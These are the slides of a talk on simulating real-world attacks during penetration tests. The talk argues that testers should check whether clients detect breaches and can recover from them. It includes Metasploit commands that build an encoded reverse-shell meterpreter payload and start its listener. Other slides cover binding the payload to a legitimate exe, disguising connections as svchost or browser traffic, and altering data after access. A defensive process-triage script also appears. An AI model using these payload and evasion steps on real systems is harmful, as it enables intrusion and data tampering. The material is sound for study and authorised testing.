Simulating Real World Attacks
Thomas Mackenzie
Acknowledgements

Chris Nickerson


Carlos Perez

Simon Whitehouse
Introduction / Scope
Are clients aware of attacks happening to
them?


If they are not, how can we help them?


How can we test if they are aware of an attack?
Remediation of an Attack
Remediation -
 Step One -
   Fixing the vulnerability that was exploited


 Step Two -
   Dealing with what happened post exploitation
Case Study
Lush.co.uk


They found out at the end of January about the
attack


Stated that the attack started “they think” on
the 4th October
Case Study cont.
Zurich UK


Lost 46,000 Customer Records


Found out 1 year later


Cost £2.28 million in fines - Not to mention fixing
Case Study cont.
Chain of events -
 When did it start?
 When did it end?
 What information was available to the attacker?
 What information was compromised?


Not counting -
 How it happened.
 How to stop it from happening again.
What am I saying?
Yes -
 If they knew about the vulnerability in the first place
 they could have stopped this from happening.



But they didn’t -
 The attack happened and it has cost them money, not
 just to fix it but for the chain of events work too.
Attacks we see
Layer 8 (Management)


Development Issues


0-Days


Passive Actions / Obfuscation Methods
Attacks we see cont.
These attacks are what we are seeing at the
moment.


When we do testing for clients we stop at the
vulnerability.


We stop at the exploit and we do not carry on.
Attacks we see cont.

Stopping at the vulnerability means -
 The client gets to do Step One of remediation



What about Step Two?
It is important!!!
  Without the proper things in place it can take
  a long time to fix this.

[Bar chart: time until the breach is discovered, by who finds it - Self Detection, Law Enforcement, Public Detection, Regulatory Detection; axis 0 to 200]
Why didn’t they know?
There are a lot of things in place at the
moment that help people detect attacks / even
stop them.
 IDS / IPS / FW / Logs etc.


Attacks are still occurring and we are still
hearing about them all the time.
Why didn’t they know? cont.
Do we test this in our pen test?


How can we test if they are aware of an
attack?


Certainly not by just exploiting the
vulnerability; we have to deep dive.
Is it Real?


Unless what you do is real your
client WILL NOT CARE!
Ask them!

Ask them what they care about


Why do they care?
The Brand
Employees
Customers
Money
Unless...

Unless the attack happens for real they don’t
have to deal with the aftermath!


Are they prepared?
IR

Not all companies have IR teams


How long does it take for the attacker’s trail to
be found?
Knowing you have been compromised = good


When and how long for = better
Reporting

When it comes to the report, attack them with
simulated examples - examples you could
recreate.
 Could you kill someone?
 Can you steal money?
 Can you change / recreate their product?
Report cont.
Give a time window / speak to only one person


Document everything you do


Ask them what they saw you do


Compare
Did they know?

Did they know you were attacking them?


If so, did they try to stop you?


If not, why not!
Noise Levels
Low -
 Ninja Hacking Skillz




Medium -
 Make a few mistakes that should be detected




High -
 Scan them to hell and back
Graded Levels


Level 1 - 5


Starting at script kiddies and going up to criminals
What are we doing!


Attacking systems with real results instead of
just giving information they don’t care about.
Methods


Low hanging fruit are the first checkpoints
 Processes, connections, EventLog and in some cases
 memory dumps
Processes
Time of creation


Parent PID


Owner


Command Line
Hide!
Hide your connections


SVCHOST.exe looks normal if connecting to
high ports


Firefox, Dropbox, AV 80 and 443
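The checkpoints above (parent PID, owner, command line, and which remote ports a process talks to) can be turned into a triage pass a defender runs over a process listing, which is what catches a payload that blends in by calling itself SVCHOST.exe or sitting on 80/443. This is an added example, not code from the talk: the process records, the expected-parent table, the service-account list and the port rule are all constructed assumptions, and creation time is left to the analyst.

```python
from dataclasses import dataclass, field

# Constructed reference data (assumptions, not from the talk): where core
# Windows binaries live, who starts them, and which accounts should own them.
SYSTEM_DIR = r"c:\windows\system32"
EXPECTED_PARENT = {"svchost.exe": "services.exe", "lsass.exe": "wininit.exe"}
SERVICE_ACCOUNTS = {"nt authority\\system", "nt authority\\local service",
                    "nt authority\\network service"}
WEB_PORTS = {80, 443}
WEB_CLIENTS = {"firefox.exe", "dropbox.exe"}

@dataclass
class Proc:  # one process-list row joined with its established connections
    pid: int
    name: str
    parent_name: str
    owner: str
    cmdline: str
    remote_ports: list[int] = field(default_factory=list)

def triage(p: Proc) -> list[str]:
    """Reasons this process deserves a closer look (empty list = looks normal)."""
    name, findings = p.name.lower(), []
    expected = EXPECTED_PARENT.get(name)
    if expected:  # core system binary: lineage, path, owner and args are fixed
        if p.parent_name.lower() != expected:
            findings.append(f"parent is {p.parent_name}, expected {expected}")
        if not p.cmdline.lower().startswith(f"{SYSTEM_DIR}\\{name}"):
            findings.append("not running from System32: " + p.cmdline)
        if p.owner.lower() not in SERVICE_ACCOUNTS:
            findings.append("running as user account " + p.owner)
        if name == "svchost.exe" and "-k" not in p.cmdline.split():
            findings.append("svchost.exe without a -k service group")
    odd = [port for port in p.remote_ports if port not in WEB_PORTS]
    if odd and (expected or name in WEB_CLIENTS):  # port does not fit the role
        findings.append("unexpected remote ports " + ", ".join(map(str, odd)))
    return findings

def triage_all(procs: list[Proc]) -> dict[int, list[str]]:
    """Map PID -> findings for every process that raised at least one."""
    return {p.pid: hits for p in procs if (hits := triage(p))}
# Constructed sample shaped like tasklist/netstat output (not real data).
SAMPLE = [
    Proc(748, "svchost.exe", "services.exe", "NT AUTHORITY\\SYSTEM",
         r"C:\Windows\System32\svchost.exe -k netsvcs", [443]),
    Proc(3120, "svchost.exe", "explorer.exe", "CORP\\ceo",
         r"C:\Users\ceo\AppData\Local\Temp\svchost.exe", [4444]),
    Proc(2210, "firefox.exe", "explorer.exe", "CORP\\ceo",
         r"C:\Program Files\Mozilla Firefox\firefox.exe", [80, 443]),
]
```

Only PID 3120 comes back from triage_all(SAMPLE), with all five checks firing; the real svchost and the browser on 80/443 stay quiet.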
Example

So what are we actually talking about?


How can we go about simulating an attack
like the one we have just spoken about?
Ask and you shall receive

Brief


Discuss options for testing


What is important to them?
Seek and you will find

What was important to them?


Are there any exploits / 0-days for that piece of
software?
Knock and the door will be opened
Simply and easily: do not give up


There is always going to be some avenue of
attack for this client; they may just not know
about it


Look at the following example
Attacking Layer 8
Idiots in the company are your first port of
call.


Is the CEO an idiot?


Skype is important to them - attack them with
what is important!
Attacking Layer 8 cont.
./msfpayload windows/meterpreter/reverse_tcp LHOST=x.x.x.x R | ./msfencode -e x86/shikata_ga_nai -c 5 -t exe -o payload.exe
./msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST x.x.x.x
exploit
Attacking Layer 8 cont.
Using IExpress you can bind a primary .exe
and your payload together


Settings available in IExpress


Running that evil .exe (BANG) reverse shell!
Do not leave it there!
What did I say at the beginning?


Once you have shell do something with it so
that it actually means something to them


Delete data / change data / get addresses /
create ways to stay there!
But WAIT!!! POLITICS!

You cannot just delete data without
permission!


Make sure you find out what you can do!
If you can delete...


You most likely can add
What is better? This?
[Comparison slides, images only]
WHAT IS ALL THIS!


By simulating these attacks the way I am
talking about, the client can then see exactly
what they would need to do if it was a real
attack!
Future


@sponex and I are creating a website about
this and some guides that link to some good
methodologies out there.
Summary
Attack them, don’t pussyfoot around!


Find out what they care about.


Make them realise how hard it would be to
fix.
:~$ whoami
Director of upSploit Limited
Soon to be Web Application Security Consultant for Trustwave
British Student
Podcaster
Questions
thomas@tmacuk.co.uk

www.tmacuk.co.uk / @tmacuk

www.upsploit.com / @upsploit
